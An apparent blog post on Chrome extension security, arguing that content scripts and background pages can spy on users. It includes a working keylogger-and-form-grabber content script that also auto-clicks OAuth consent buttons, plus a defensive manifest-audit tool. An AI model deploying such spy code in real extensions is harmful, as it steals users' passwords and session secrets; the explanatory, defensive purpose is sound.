Security - Google Chrome Background Pages
UPDATE: Chrome extensions do ask for permission at install time for privileged access to certain domains, which they could otherwise not reach because of the same-origin policy. But this only means that an extension which has not been granted yourbank.com cannot, for instance, send a cross-origin POST to yourbank.com from its background page. Nothing stops a content script that runs inside the bank's page from reading your password as you type it and passing it to the background page, which can then transmit it to any host the extension was allowed to talk to.
This is a quick writeup of something that came to mind today. As the browser increasingly becomes a platform for “applications” (extensions) to run on, I started thinking about some of the security implications.
I have lately been using the Google Chrome Extension API to develop a Chrome extension.
I quickly realized that many, many extensions load JavaScript (so-called content scripts) into every page, doing all kinds of things.
This is nothing new, because everyone knows that JavaScript is not safe, right? Well, no.
JavaScript is as safe as any other language; the point is that the architecture of today's web browsers allows extensions to run scripts inside every page, and those scripts can potentially spy on your web browsing, your banking activity and so on.
Background pages and content scripts are actually a big security flaw. Just imagine a few of the things they can do:
- open and close tabs in the background
- click “OK” for you somewhere in a page (e.g. while you are authorizing an application via OAuth)
- listen to your keystrokes
- make cross-domain XMLHttpRequests from the background page, using or transmitting your session secret and/or your bank's mobile TAN
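To make the list above concrete, here is an added example (not code from the original post, and not any real extension) of the shape a content script takes when it does exactly those things. The DOM is passed in rather than taken from the global `document`, and a small constructed fake document stands in for the page, so the logic can be exercised under Node; in a real extension the `send` callback would be `chrome.runtime.sendMessage`, and the background page would relay the data with a cross-origin XMLHttpRequest to whichever hosts its manifest lists. The bank URL and field names are made up.

```javascript
// Added example, not from the original post: the shape of a content script
// that does what the list above describes. The document is injected so the
// logic can run outside a browser; the fake document and the bank page
// below are constructed for illustration and describe no real extension.

// installSpy attaches listeners to `doc` and forwards everything it sees
// through `send`. In a real extension `send` would be
// chrome.runtime.sendMessage, and the background page, which holds the
// extension's host permissions, would relay the data with a cross-origin
// XMLHttpRequest. The page's same-origin policy plays no role here.
function installSpy(doc, send) {
  let typed = '';
  doc.addEventListener('keydown', (e) => {
    if (e.key === 'Enter') {          // flush the keystroke buffer on Enter
      send({ type: 'keys', data: typed });
      typed = '';
    } else if (e.key.length === 1) {  // printable characters only
      typed += e.key;
    }
  });
  doc.addEventListener('submit', (e) => {
    const fields = {};
    for (const el of e.target.elements) fields[el.name] = el.value;
    // password, hidden CSRF token, TAN: all readable, all forwarded
    send({ type: 'form', action: e.target.action, data: fields });
  });
  // Clicking for the user: if the page has an "allow" button (think of an
  // OAuth consent screen), press it without the user ever seeing it.
  const allow = doc.querySelector('button[name="allow"]');
  if (allow) allow.click();
}

// Constructed minimal document so the block runs stand-alone under Node.
function makeFakeDocument() {
  const listeners = {};
  const allowButton = { clicks: 0, click() { this.clicks += 1; } };
  return {
    addEventListener(type, fn) { (listeners[type] = listeners[type] || []).push(fn); },
    dispatch(type, event) { (listeners[type] || []).forEach((fn) => fn(event)); },
    querySelector(sel) { return sel === 'button[name="allow"]' ? allowButton : null; },
    allowButton,
  };
}

// Simulate a user logging in to a (constructed) bank page with the spy
// installed; returns what the content script would have sent to the
// background page, plus how many times it clicked the "allow" button.
function simulateLogin() {
  const sent = [];
  const doc = makeFakeDocument();
  installSpy(doc, (msg) => sent.push(msg));
  for (const ch of 'hunter2') doc.dispatch('keydown', { key: ch });
  doc.dispatch('keydown', { key: 'Enter' });
  doc.dispatch('submit', {
    target: {
      action: 'https://yourbank.example/login',
      elements: [
        { name: 'user', value: 'alice' },
        { name: 'password', value: 'hunter2' },
        { name: 'csrf', value: 'c0ffee' },   // hidden field the user never sees
      ],
    },
  });
  return { sent, allowClicks: doc.allowButton.clicks };
}

const CAPTURED = simulateLogin();
```

`CAPTURED.sent` holds two messages: the typed password collected keystroke by keystroke, and the complete form including the hidden CSRF token; `CAPTURED.allowClicks` is 1 because the consent button was pressed the moment the script loaded. None of this needs any permission beyond the content script being matched to the page.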
The only “normative” force is that extensions are delivered as JavaScript and can therefore be inspected by developers, so normally they won't do anything strange. But who knows?
I think Google should allow only signed extensions that they have reviewed for harmful behaviour, similar to how Apple reviews its apps, and let only those signed extensions run on the Chrome platform. The same is true of other browsers like Firefox and IE9.
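Inspecting an extension starts with its manifest, because that is where the two things the UPDATE at the top distinguishes are declared: where content scripts are injected (`content_scripts[].matches`) and which hosts the background page may talk to cross-origin (`permissions` in manifest v2, `host_permissions` in v3). The following is an added example of such an audit, not code from the original post; the manifest is constructed, the function names are my own, and the match-pattern rules (`*` scheme meaning http or https, `*.example.com` covering the domain and its subdomains, the path as a glob that I match against path plus query string) follow Chrome's documented match patterns in simplified form.

```javascript
// Added example, not from the original post: audit a Chrome extension
// manifest the way a reviewer would, answering for each URL whether a
// content script is injected there and whether the background page may
// make a cross-origin request to it. The manifest is constructed; the key
// names (content_scripts, matches, permissions, host_permissions) are the
// documented manifest keys.

function escapeRe(s) { return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); }

// Compile a Chrome match pattern ("scheme://host/path" or "<all_urls>")
// into a predicate over URL strings. Scheme "*" means http or https, host
// "*.example.com" means example.com and its subdomains, the path is a glob
// (matched here against path plus query string, a simplification).
function compileMatchPattern(pattern) {
  if (pattern === '<all_urls>') return () => true;
  const m = /^(\*|https?|file|ftp):\/\/([^/]*)(\/.*)$/.exec(pattern);
  if (!m) throw new Error('not a match pattern: ' + pattern);
  const [, scheme, host, path] = m;
  const pathRe = new RegExp('^' + path.split('*').map(escapeRe).join('.*') + '$');
  return (urlString) => {
    let url;
    try { url = new URL(urlString); } catch (_) { return false; }
    const s = url.protocol.slice(0, -1);
    if (scheme === '*' ? !(s === 'http' || s === 'https') : s !== scheme) return false;
    if (host === '*') {
      // any host
    } else if (host.startsWith('*.')) {
      const base = host.slice(2);
      if (url.hostname !== base && !url.hostname.endsWith('.' + base)) return false;
    } else if (url.hostname !== host) {
      return false;
    }
    return pathRe.test(url.pathname + url.search);
  };
}

// Host patterns live among the API permissions in manifest v2 and under
// host_permissions in v3; anything with a scheme (or <all_urls>) is one.
const isHostPattern = (p) => p === '<all_urls>' || p.includes('://');

// Summarise what the manifest lets the extension do to each URL: inject a
// content script (from content_scripts) and/or reach it cross-origin from
// the background page (from the host patterns).
function auditManifest(manifest, urls) {
  const perms = manifest.permissions || [];
  const hostPatterns = perms.filter(isHostPattern).concat(manifest.host_permissions || []);
  const apiPermissions = perms.filter((p) => !isHostPattern(p));
  const injectors = (manifest.content_scripts || [])
    .flatMap((cs) => (cs.matches || []).map(compileMatchPattern));
  const reachers = hostPatterns.map(compileMatchPattern);
  const perUrl = urls.map((url) => ({
    url,
    contentScript: injectors.some((f) => f(url)),
    crossOriginRequest: reachers.some((f) => f(url)),
  }));
  return { apiPermissions, hostPatterns, perUrl };
}

// Constructed manifest: a content script on every page, but cross-origin
// requests only to the extension's own (made-up) API host.
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: 'Helpful Toolbar',
  content_scripts: [{ matches: ['<all_urls>'], js: ['content.js'] }],
  permissions: ['tabs', 'https://api.helpful-toolbar.example/*'],
  background: { scripts: ['background.js'] },
};

const REPORT = auditManifest(SAMPLE_MANIFEST, [
  'https://yourbank.example/login',
  'https://api.helpful-toolbar.example/collect',
]);
```

`REPORT.perUrl` shows the point of the UPDATE in one table: for the bank login page the content script runs (`contentScript: true`) while a direct cross-origin request is refused (`crossOriginRequest: false`), and for the extension's own API host both are allowed, which is all the background page needs to receive what the content script collected and forward it. When reviewing a real extension, a `<all_urls>` or `*://*/*` entry in `matches` is the line to look for first.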
I think Safari is the only browser that allows only signed extensions, which is a big plus.
Comments are appreciated!